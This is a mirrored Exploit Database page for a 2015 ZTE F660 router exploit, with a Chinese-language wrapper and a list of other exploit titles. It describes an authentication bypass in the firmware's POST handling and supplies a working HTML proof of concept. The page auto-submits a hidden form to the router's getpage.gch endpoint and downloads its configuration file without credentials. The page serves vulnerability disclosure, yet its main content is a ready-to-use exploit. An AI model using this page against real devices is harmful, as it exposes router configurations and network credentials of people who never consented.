ZTE F660 – Remote Configuration Download

Exploit Database
24 阅读

作者： Daniel Cisa

日期： 2015-05-11
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/36978/

/*
Exploit Title : ZTE remote configuration download
Date: 09 May 2015
Exploit Author: Daniel Cisa
Vendor Homepage : http://wwwen.zte.com.cn/en/
Platform: Hardware
Tested On : ZTE F660
Firmware Version: 2.22.21P1T8S
--------------------------
 Config remote download
--------------------------
ZTE F660 Embedded Software does not check Cookies And Credentials on POST
method so
attackers could download the config file with this post method without
authentication.

*/
<html>
<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action="
http://192.168.1.1/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch"
enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">
</body>
</html>

last Exploits
ZTE F660 – Remote Configuration Download的更多信息

AdaptCMS 2.0.2 TinyURL Plugin – ‘admin.php’ Multiple SQL Injections：
BlogEngine 3.3 – ‘syndication.axd’ XML External Entity Injection：
Xibo – ‘layout’ HTML Injection：
Eleanor CMS – Cross-Site Scripting / Multiple SQL Injections：
Sitemakin SLAC 1.0 – ‘my_item_search’ SQL Injection：
OrangeHRM 2.6.11 – ‘/lib/controllers/CentralController.php?id’ SQL Injection：
Micronetsoft RV Dealer Website – SQL Injection：
Cisco Unified Communications Manager 7/8/9 – Directory Traversal：